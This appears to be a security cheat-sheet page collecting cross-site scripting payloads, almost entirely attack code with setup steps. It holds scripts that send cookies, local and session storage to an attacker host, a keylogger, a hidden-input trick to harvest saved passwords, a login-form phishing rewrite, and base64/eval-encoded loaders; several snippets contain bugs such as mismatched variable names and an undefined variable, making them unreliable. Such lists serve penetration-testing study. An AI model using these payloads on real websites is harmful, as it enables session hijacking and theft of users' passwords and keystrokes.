---
description: >-
  This page focusing on Cross-Site Scripting (XSS) attacks and payloads. It
  offers a collection of examples and information related to XSS, including
  various payload scenarios and code snippets.
---

# Payloads

## Cross Site Scripting Basic Java script

Sample Java script

```javascript
01  function processData(data) {
02    data.items.forEach(item => {
03      console.log(item)
04    });
05  }
06
07  let foo = {
08    items: [
09      "Hello",
10      "Hacker",
11      "Here"
12    ]
13  }
14
15  processData(foo)
```



## **Moving the Payload to an external Resource**

```bash
#**Step 1: Create Payload**
echo "alert(1)" > xxs.js

#**Step 2: Start python server**
python3 -m http.server 80

#**Step 3: Submit Payload**
<script src="http://192.168.XX.XX/xxs.js"></script>
```



## Stealing Session Cookies

```bash
#**Step 1: Create payload in xxs.js file **

let cookie = document.cookie
let encodeCookie = encodeURIComponent(cookie)
fetch("http://192.168.XX.XX/exfil?data" + encodedCookie)

#**Step 2: Start python server**
	python3 -m http.server 80

#**Step 3: Submit Payload**
	<script src="http://192.168.XX.XX/xxs.js"></script>
```



## Sealing Local Secrets using XXS

<details>

<summary>Local Storage</summary>

```bash
#**Step 1: Create Payload in XXS.js file**

let encodeData = encodeURIComponent(data)
fetch("http://192.168.XX.XX/exfil?data=" + encodeData)

**#Step 2: Create Payload in** xxs.js file**
	
	python3 -m http.server 80

#**Step 3: Submit Payload**
	<script src="http://192.168.XX.XX/xxs.js"></script>
	
```

</details>

<details>

<summary>Session  Storage</summary>

```bash
// **#Step 1: Create Payload in** xxs.js file**

let data =JSON.stringify(sessionStorage)
let encodeData = encodeURIComponent(data)
fetch("http://192.168.49.129/exfil?data=" + encodeData)


// **#Step 2: Start http server**
	
	python3 -m http.server 80

// #**Step 3: Submit Payload**
	<script src="http://192.168.49.129/xxs.js"></script>
```

</details>



## KEYloggin with XXS

```bash
**#Step 1: Create Payload in** xxs.js file**

function logKey(event){
	fetch("http://192.168.XX.XX/k?key=" + event.key)
}
document.addEventListener('keydown', logKey);

**#Step 2: Start HTTP server **

	python3 -m http.server 80

****#**Step 3: Submit Payload**

	<script src="http://192.168.XX.XX/xxs.js"></script>

#Step 4: Get the output using below command
awk '{split($7,a,"="); print a[2]}' log.txt | tr -d '\n'
```



## Stealing Saved password using XSS

```bash
**#Step 1: Create Payload in** xxs.js file**
	let body = document.getElementsByTagName("body")[0]
	
	var u = document.createElement("input");
	u.type = "text";
	u.style.position = "fixed";
	//u.style.opacity = "0";
	
	var p = document.createElement("input");
	p.type = "password";
	p.style.position = "fixed";
	//p.style.opacity = "0";
	
	 body.append(u)
	 body.append(p)
	
	 setTimeout(function(){ 
		   fetch("http://192.168.XX.XX/k?u=" + u.value + "&p=" + p.value)
		 }, 5000);

**#Step 2: Start HTTP Server **

	python3 -m http.server 80

****#**Step 3: Submit Payload**

	<script src="http://192.168.XX.XX/xxs.js"></script>
```



## Escape innerHTML function: Steal the cookie

```javascript
<img src="/" onerror='fetch("http://192.168.XX.XX/exfil?data=" + encodeURIComponent(JSON.stringify(localStorage)))'>
```



## StoreKeylog

```javascript
function logKey(event) {
  fetch("https://192.168.XX.XX/k?key=" + encodeURIComponent(event.key))
    .then(response => {
      if (!response.ok) {
        throw new Error("Network response was not ok");
      }
      return response;
    })
    .then(data => {
      console.log("Key logged successfully:", event.key);
    })
    .catch(error => {
      console.error("Error logging key:", error);
    });
}

document.addEventListener("keydown", logKey);
```



## Phishing

```javascript
//**#Step 1: Create Payload in** xxs.js file**
fetch("login").then(res => res.text().then(data => {
	document.getElementsByTagName("html")[0].innerHTML = data
	document.getElementsByTagName("form")[0].action = "http://192.168.XX.XX"
	document.getElementsByTagName("form")[0].method = "get"
}))

// **#**Step 2: Start the HTTP server**
	python3 -m http.server 80


// **#**Step 3: Submit Payload**
 <script src="http://192.168.XX.XX/phishing.js"></script>
```



## XXS Encoded Payload

```bash
// payload xxs.js

let cookie = document.cookie
let encodeCookie = encodeURIComponent(cookie)
fetch("http://192.168.XX.XX/exfil?data" + encodedCookie)

//**Step 2: Start python server
	python3 -m http.server 80



//base 64 (<script src="http://192.168.XX.XX/xxs.js"></script>)

PHNjcmlwdCBzcmM9Imh0dHA6Ly8xOTIuMTY4LlhYLlhYL3h4cy5qcyI+PC9zY3JpcHQ+


'+eval(atob('PHNjcmlwdCBzcmM9Imh0dHA6Ly8xOTIuMTY4LlhYLlhYL3h4cy5qcyI+PC9zY3JpcHQ+'))+'

'+btoa(eval(atob('PHNjcmlwdCBzcmM9Imh0dHA6Ly8xOTIuMTY4LlhYLlhYL3h4cy5qcyI+PC9zY3JpcHQ+')))+'




```

